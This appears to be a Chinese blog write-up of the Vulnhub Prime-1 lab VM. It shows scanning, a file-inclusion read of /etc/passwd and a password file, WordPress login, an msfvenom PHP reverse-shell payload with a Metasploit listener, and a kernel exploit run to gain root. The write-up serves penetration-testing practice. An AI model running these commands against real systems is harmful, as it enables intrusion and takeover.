靶场prime-1练习

最新推荐文章于 2023-03-07 23:56:42 发布
最新推荐文章于 2023-03-07 23:56:42 发布
阅读量825 收藏
点赞数
分类专栏: 笔记 文章标签: java jvm 开发语言 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49091880/article/details/127424270
版权

以下是靶场地址

下载安装该虚拟机,以下是虚拟机打开界面

1、探测开放端口

nmap -p 1-65535 -A 192.168.133.139

2、端口进行扫描,发现存在22端口和80端口访问80端口,如图所示:

注:

1查看网页源码

2目录扫描

3F12 3.利用kali自带目录扫描工具进行扫描

1dirb http://192.168.133.139/

2dirb http://192.168.133.139  -X .txt,.zip,.php

 (3)wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.133.139/ind ex.php?FUZZ

成功获得参数file,但结果却不尽人意,挖错文件名了

 

不过不灰心,之前我们忽略了一个参数,我们可以搞一波

curl    http://192.168.133.139/index.php?file=location.txt

注:如何将kali文件下载到物理机

sz file   /usr/share/wfuzz/wordlist/general/common.txt   (字典路径) 4.找到正确的参数以后进行执行

curl  http://192.168.133.139/image.php?secrettier360=aaahttp://192.168.133.139/image.php?secrettier360=aaa

注:提示我们终于获得正确的参数

3、利用参数请求查看passwd文件,成功获取敏感信息http://192.168.133.139/image.php?secrettier360=/etc/passwd

 就在此时一个新大陆出现了

 

curl     http://192.168.133.139/index.php?secrettier360=/home/saket/password.txt 

 

curl    http://192.168.133.139/image.php?secrettier360=/home/saket/password.txt 

 

4、在之前我们通过目录扫描发现存在wordpress的目录,进行访问,存在登录界面,通过观察页面得到用 户名 

 

5、利用kali自带工具cmseek进行指纹信息收集,有点尴尬,这个工具没有,我进行了下载 

 

注:也可以利用wpscan   进行漏洞信息收集

wpscan --url http://192.168.133.139/wordpress/ --enumerate u

6、 利用找出的用户名和密码进行登录     用户名:victor 密码:follow_the_ippsec,成功登录后台

登录后台以后首先想找上传点,比如上传图片、上传文件等等 

7、利用msf生成反弹链接

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.133.129   lport=7777 -o shell.php

 

点击保存,保存成功。

8、利用msfconsole进行监听反弹shell,通过访问写入反弹shellphp文件触发,成功弹回shell

use exploit/mulit/handler
set payload php/meterpreter/reverse_tcp set lhost 192.168.133.129
set lport 7777
exploit

 得出Linux内核版本

9、 通过msfconsole 查找相关漏洞

searchsploit 16.04 Ubuntu

msfconsole的数据存储 cd /usr/share/exploitdb/exploits/linux

 cp 45010.c /root

重新进行编译

gcc 45010.c

gcc 45010.c -o 45010

在之前获取到meterpreter那里进行上传

upload  /root/45010 /tmp/45010

 进行提权

shell #进行shell执行

cd /tmp #进入tmp文件中chmod +x 45010 #权限提升

./45010 #执行

whoami   #查看当前权限450

10、成功拿到root权限以后,在root权限下会存放一些重要的文件

 

 成功获取flag值

墨轩小白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
渗透测试经典靶场学习-DVWA练习.
07-02
渗透测试经典靶场学习-DVWA练习.
Prime靶场
wcl20010的博客
05-02 465
prime靶场(vulnhub) 靶场地址:链接:https://pan.baidu.com/s/1jsccNmrmhG2dPuaz6zGwmA 提取码:ap5g 目录 X shell 连接 kali: #首先查看kali是否打开了22端口。ssh协议:ssh远程连接 netstat -an|grep 22 #打开服务 service ssh start 1. 主机发现: #采用nmap nmap -sP 192.168.128.1/24 #直接对128这个网段进行扫描,-sP代表只进行p
vulnhub靶场实战系列(二)之 prime1
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-07 424
接下来我们就要去找网站的漏洞点利用了,熟悉wordpress的朋友都知道,woedpress有一个主题编辑器 Appearance—>Theme Editor可以修改文件,我们可以向这个文件中写入反弹的shell,来获得目标机器的控制权。这里就犯难了,那么多的参数,我们哪里看的过来,所以这里我们需要改变一下思路,去找那些不相同的,我们可以看到大部分的响应内容都是12 word的,那我们就过滤12个Word的结果看看。现在我们已经获得了一个普通用户的权限,接下来就是提权得到root权限,最终得到flag。
靶机-primel
qq_45751902的博客
10-18 1111
靶机:primel系统:ubuntu没有密码,没有ip,nat模式攻击机:kali目标:获得root的flag。
Vulnhub之prime-1靶场[渗透测试]
qq_60115503的博客
08-29 1044
将下载好的靶场导入VMware,虚拟机设置网络模式为nat模式,即可开启渗透。
【vulnhub靶场PRIME:1打靶过程记录
didiplus
07-17 2729
最近发现一个很有趣的靶场集合,里面涵盖了一些基本的漏洞,我们通过漏洞复现。了解一些网络安全的一些基本操作。
vulnhub靶场-Prime1
ad12456的博客
03-30 2795
靶场练习
[渗透测试学习靶机07] vulnhub靶场 Prime 2
weixin_47112073的博客
10-27 1518
Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
文件上传漏洞练习靶场upload-labs
07-05
文件上传漏洞练习靶场upload-labs内有文件上传漏洞的各种类型绕过的例题,非常全面,对加深文件上传漏洞的理解、利用非常有帮助。
sqli-labs靶场练习笔记
最新发布
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
获取flag值
热门推荐
qq_49091880的博客
01-02 1万+
获取FLAG值 一、SSH服务器 1.如何从外部进入最终root主机,获得flag值 SSH:建立在应用层基础上的协议 SSH是目前较可靠,专门远程登录会话和其他网络服务提供安全性的 协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题 2.SSH基于TCP 22端口的服务 3.SSH协议认证机制 (1)基于口令的安全验证 (2)基于密钥的安全验证 注:id_rsa:私钥 id_rsa.pub:公钥 二、实验环境 1.攻击机:192.168.1.105 2.靶机机器:192.168.1.106
计算机网络基础
qq_49091880的博客
07-06 9381
计算机网络 一、计算机网络原理(1.1-1.2) 1.计算机网络发展的四个历程 (1)计算机网络的形成与发展 ①数据通信技术的日趋成熟为计算机网络的形成和发展奠定了技术基础。 ②分组交换概念的提出为计算机网络的形成和发展奠定了理论基础 ③阿帕网的成功运行证明了分组交换技术的正确性 ④TCP/IP协议的广泛应用为大规模网络互连奠定了坚实的基础。 2.新型技术的发展的两个条件 (1)社会的强烈要求 (2)前趋技术的日益成熟 3.阿帕网的前期要求问题 网络拓扑结构和数据传输方式 4.分组交换技术的提出 网络路由器
Sqlmap参数学习笔记
qq_49091880的博客
01-04 4717
自己的学习笔记,希望各位大佬批评指正
CVE-2022-0847Linux内核提权漏洞
qq_49091880的博客
04-12 4450
步骤有点简略,各位师傅见谅
渗透测试之XSS脚本
qq_49091880的博客
04-17 2427
一、XSS脚本的特点 1.XSS最大的特点就是能注入恶意的代码到用户流浪器的网页上, 从而达到劫持用户会话的目的。 2.跨站脚本 是一种经常出现在web应用程序中的计算机安全漏洞,是由于web应用程序对用户 的输入过滤不严产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他 用户浏览这些网页的时候,就会执行其中的恶意代码,对受害用户可能采用cookie资料 窃取,会话劫持,钓鱼欺骗等攻击手段。 3.XSS脚本实例 <html> <head>xss<
Lanproxy路径遍历漏洞复现
qq_49091880的博客
10-08 1755
0x00 简介 Lanproxy是一种把局域网个人计算机、服务器代理到公共网络上的内网穿透工具,支持 tcp流量转发,可以支持任何 tcp高层协议,可做访问内网网站、本地支付接口调试、 ssh访问、远程桌面等,而且自带wen在线管理面板,添加端口配置十分简单。现在市场上提供类似服务的有花生壳、TeamView、GoToMyCloud等,但是第三方的公共网络服务器必须为第三方支付费用,而且这些服务存在种种限制,此外,由于数据包将通过第三方网络传输,因此对数据安全是一大威胁。 0x01 漏洞概述 Lanp
upload-labs靶场1-21通关
08-17
要通关 upload-labs 靶场的第 1-21 关,你需要依次完成每个关卡的任务。以下是通关每个关卡的一些提示: 1. Level 1 - 文件上传漏洞:尝试上传一个恶意文件,看看能否绕过上传限制。 2. Level 2 - 文件包含漏洞:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值